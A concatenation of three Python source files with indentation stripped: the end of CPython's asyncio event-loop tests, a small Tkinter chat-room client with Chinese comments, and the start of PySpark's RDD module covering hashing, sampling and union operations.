def test_read_pty_output(self):
super().test_read_pty_output()
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
def test_write_pty(self):
super().test_write_pty()
if hasattr(selectors, 'EpollSelector'):
class EPollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.EpollSelector())
if hasattr(selectors, 'PollSelector'):
class PollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.PollSelector())
# Should always exist.
class SelectEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
pass
class HandleTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
self.loop.get_debug.return_value = True
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h._cancelled)
h.cancel()
self.assertTrue(h._cancelled)
def test_callback_with_exception(self):
def callback():
raise ValueError()
self.loop = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.loop.call_exception_handler.assert_called_with({
'message': test_utils.MockPattern('Exception in callback.*'),
'exception': mock.ANY,
'handle': h,
'source_traceback': h._source_traceback,
})
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = asyncio.Handle(lambda: None, (), self.loop)
wd['h'] = h # Would fail without __weakref__ slot.
def test_handle_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s>'
% (filename, lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<Handle cancelled>')
# decorated function
cb = asyncio.coroutine(noop)
h = asyncio.Handle(cb, (), self.loop)
self.assertEqual(repr(h),
'<Handle noop() at %s:%s>'
% (filename, lineno))
# partial function
cb = functools.partial(noop, 1, 2)
h = asyncio.Handle(cb, (3,), self.loop)
regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial function with keyword args
cb = functools.partial(noop, x=1)
h = asyncio.Handle(cb, (2, 3), self.loop)
regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial method
if sys.version_info >= (3, 4):
method = HandleTests.test_handle_repr
cb = functools.partialmethod(method)
filename, lineno = test_utils.get_function_source(method)
h = asyncio.Handle(cb, (), self.loop)
cb_regex = r'<function HandleTests.test_handle_repr .*>'
cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
regex = (r'^<Handle %s at %s:%s>$'
% (cb_regex, re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
def test_handle_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# double cancellation won't overwrite _repr
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_handle_source_traceback(self):
loop = asyncio.get_event_loop_policy().new_event_loop()
loop.set_debug(True)
self.set_event_loop(loop)
def check_source_traceback(h):
lineno = sys._getframe(1).f_lineno - 1
self.assertIsInstance(h._source_traceback, list)
self.assertEqual(h._source_traceback[-1][:3],
(__file__,
lineno,
'test_handle_source_traceback'))
# call_soon
h = loop.call_soon(noop)
check_source_traceback(h)
# call_soon_threadsafe
h = loop.call_soon_threadsafe(noop)
check_source_traceback(h)
# call_later
h = loop.call_later(0, noop)
check_source_traceback(h)
# call_at
h = loop.call_later(0, noop)
check_source_traceback(h)
@unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
'No collections.abc.Coroutine')
def test_coroutine_like_object_debug_formatting(self):
# Test that asyncio can format coroutines that are instances of
# collections.abc.Coroutine, but lack cr_core or gi_code attributes
# (such as ones compiled with Cython).
class Coro:
def send(self, v):
pass
def throw(self, *exc):
pass
def close(self):
pass
def __await__(self):
pass
coro = Coro()
coro.__name__ = 'AAA'
self.assertTrue(asyncio.iscoroutine(coro))
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
coro.__qualname__ = 'BBB'
self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')
coro.cr_running = True
self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')
coro = Coro()
# Some coroutines might not have '__name__', such as
# built-in async_gen.asend().
self.assertEqual(coroutines._format_coroutine(coro), 'Coro()')
class TimerTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(hash(h), hash(when))
def test_timer(self):
def callback(*args):
return args
args = (1, 2, 3)
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, mock.Mock())
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h._cancelled)
# cancel
h.cancel()
self.assertTrue(h._cancelled)
self.assertIsNone(h._callback)
self.assertIsNone(h._args)
# when cannot be None
self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args,
self.loop)
def test_timer_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.TimerHandle(123, noop, (), self.loop)
src = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() at %s:%s>' % src)
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123>')
def test_timer_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.TimerHandle(123, noop, (), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.is_closed)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.create_task, None)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.run_in_executor, f, f)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.getaddrinfo, 'localhost', 8080)
self.assertRaises(
NotImplementedError, loop.getnameinfo, ('localhost', 8080))
self.assertRaises(
NotImplementedError, loop.create_connection, f)
self.assertRaises(
NotImplementedError, loop.create_server, f)
self.assertRaises(
NotImplementedError, loop.create_datagram_endpoint, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.sock_recv, f, 10)
self.assertRaises(
NotImplementedError, loop.sock_recv_into, f, 10)
self.assertRaises(
NotImplementedError, loop.sock_sendall, f, 10)
self.assertRaises(
NotImplementedError, loop.sock_connect, f, f)
self.assertRaises(
NotImplementedError, loop.sock_accept, f)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.connect_read_pipe, f,
mock.sentinel.pipe)
self.assertRaises(
NotImplementedError, loop.connect_write_pipe, f,
mock.sentinel.pipe)
self.assertRaises(
NotImplementedError, loop.subprocess_shell, f,
mock.sentinel)
self.assertRaises(
NotImplementedError, loop.subprocess_exec, f)
self.assertRaises(
NotImplementedError, loop.set_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.default_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.call_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.get_debug)
self.assertRaises(
NotImplementedError, loop.set_debug, f)
class ProtocolsAbsTests(unittest.TestCase):
def test_empty(self):
f = mock.Mock()
p = asyncio.Protocol()
self.assertIsNone(p.connection_made(f))
self.assertIsNone(p.connection_lost(f))
self.assertIsNone(p.data_received(f))
self.assertIsNone(p.eof_received())
dp = asyncio.DatagramProtocol()
self.assertIsNone(dp.connection_made(f))
self.assertIsNone(dp.connection_lost(f))
self.assertIsNone(dp.error_received(f))
self.assertIsNone(dp.datagram_received(f, f))
sp = asyncio.SubprocessProtocol()
self.assertIsNone(sp.connection_made(f))
self.assertIsNone(sp.connection_lost(f))
self.assertIsNone(sp.pipe_data_received(1, f))
self.assertIsNone(sp.pipe_connection_lost(1, f))
self.assertIsNone(sp.process_exited())
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
def test_get_event_loop_returns_running_loop(self):
class Policy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
raise NotImplementedError
loop = None
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(Policy())
loop = asyncio.new_event_loop()
self.assertIs(asyncio._get_running_loop(), None)
async def func():
self.assertIs(asyncio.get_event_loop(), loop)
self.assertIs(asyncio._get_running_loop(), loop)
loop.run_until_complete(func())
finally:
asyncio.set_event_loop_policy(old_policy)
if loop is not None:
loop.close()
self.assertIs(asyncio._get_running_loop(), None)
if __name__ == '__main__':
unittest.main()
|
client.pyw
|
"""
这里是客户端文件,负责创建聊天室窗口
"""
from threading import Thread
from address import *
from plugins.lib.root import *
s.connect((host, port)) # 与服务器建立连接
root.title("SimpleChat") # 标题
message_frame.grid(row=0, column=0, padx=3, pady=6) # 消息窗口,第1行,第0列
text_frame.grid(row=1, column=0, padx=3, pady=6) # 输入窗口,第2行,第0列
sent_frame.grid(row=2, column=0) # 发送按钮,第3行,第0列
config.grid(row=0, column=1) # 管理按钮,第4行,第1列
message_frame.grid_propagate(0) # 固定消息窗口大小
text_frame.grid_propagate(0) # 固定输入窗口大小
sent_frame.grid_propagate(0) # 固定发送按钮大小
config.grid_propagate(0) # 固定管理窗口大小
text_message.grid() # 将消息窗口添加到容器中
text_text.grid() # 将输入窗口添加到容器中
button_sent.grid() # 将发送按钮添加到容器中
config.grid() # 将管理按钮添加到容器中
receive_thread = Thread(target=get_msg) # 建立多线程
receive_thread.start() # 启动线程
root.mainloop() # 启动Tk循环
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
import socket
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, InMemoryMerger, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
from py4j.java_collections import ListConverter, MapConverter
__all__ = ["RDD"]
def portable_hash(x):
"""
This function returns consistent hash code for builtin types, especially
for None and tuple with None.
The algorithm is similar to that one used by CPython 2.7
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if sys.version >= '3.3' and 'PYTHONHASHSEED' not in os.environ:
raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return h
return hash(x)
class BoundedFloat(float):
"""
Bounded value is generated by approximate job, with confidence and low
bound and high bound.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1] not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _load_from_socket(port, serializer):
sock = socket.socket()
sock.settimeout(3)
try:
sock.connect(("localhost", port))
rf = sock.makefile("rb", 65536)
for item in serializer.load_stream(rf):
yield item
finally:
sock.close()
def ignore_unicode_prefix(f):
"""
Ignore the 'u' prefix of string in doc tests, to make it works
in both python 2 and 3
"""
if sys.version >= '3':
# the representation of unicode string in Python 3 does not have prefix 'u',
# so remove the prefix 'u' for doc tests
literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
f.__doc__ = literal_re.sub(r'\1\2', f.__doc__)
return f
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY_SER}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY_SER)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY_SER):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (C{MEMORY_ONLY_SER}).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD has been checkpointed or not
"""
return self._jrdd.rdd().isCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(f, iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(f, iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(f, iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
:param withReplacement: can elements be sampled multiple times (replaced when sampled out)
:param fraction: expected size of the sample as a fraction of this RDD's size
without replacement: probability that each element is chosen; fraction must be [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
:param seed: seed for the random number generator
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
Note that this method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
